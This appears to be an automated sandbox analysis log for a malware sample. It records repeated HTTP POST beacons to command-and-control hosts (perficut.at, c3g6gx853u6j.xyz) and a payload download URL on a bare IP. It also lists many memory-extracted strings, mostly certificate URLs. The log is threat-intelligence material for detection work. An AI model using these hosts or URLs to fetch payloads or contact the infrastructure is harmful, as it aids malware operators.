    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://usvbhtqj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mkkxxsrovf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://udcnlsm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ixajxtxh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prwaoty.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bnitqf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yvcqvia.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkqgxxvo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fkyowof.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ytcnar.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://potobn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdsmv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xvnpqap.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: perficut.at
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjbufdolu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eolfuqpflg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdhxbtaaf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbbprfeoj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: c3g6gx853u6j.xyz
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://suuyeb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: perficut.at
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://alurrarex.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: perficut.at
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iencttqttf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: perficut.at
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umfojjc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: perficut.at
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hldvftxl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: perficut.at
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://raluqsmjf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: perficut.at
    Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://guiimg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: perficut.at
    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uyrsbss.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: c3g6gx853u6j.xyz
    Source: C:\Windows\explorer.exeDNS query: name: bit.ly
    Source: unknownNetwork traffic detected: IP country count 14
    Source: rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-Agentcurl/5.9Sec-Websocket-KeySec-Webs
    Source: rundll32.exe, 0000000C.00000003.353421199.00000156F16B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F14B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.575064363.00007DF449AE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http:///etc/puk.keyMachineGuidSOFTWARE
    Source: rundll32.exe, 0000000C.00000002.574161252.00000156EFA45000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.574161252.00000156EFA40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://179.43.176.6/getmod/xij5ka.ev8r
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.622147226.0000000000887000.00000004.00000020.00020000.00000000.sdmp, A4A.exe, 00000012.00000003.389824706.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, A4A.exe, 00000012.00000003.389907118.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enRootDirUrlSoftware
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eca.hinet.net/repository/CRL2/CA.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
    Source: A4A.exe, 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, A4A.exe, 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECAC.exe, 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, DC3D.exe, 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
    Source: explorer.exe, 00000001.00000000.261007247.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.273898806.000000000F5B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.269690947.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.265276051.000000000F5B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
    Source: DC3D.exe, 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
    Source: rundll32.exe, 0000000C.00000003.414049730.00000156F17A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
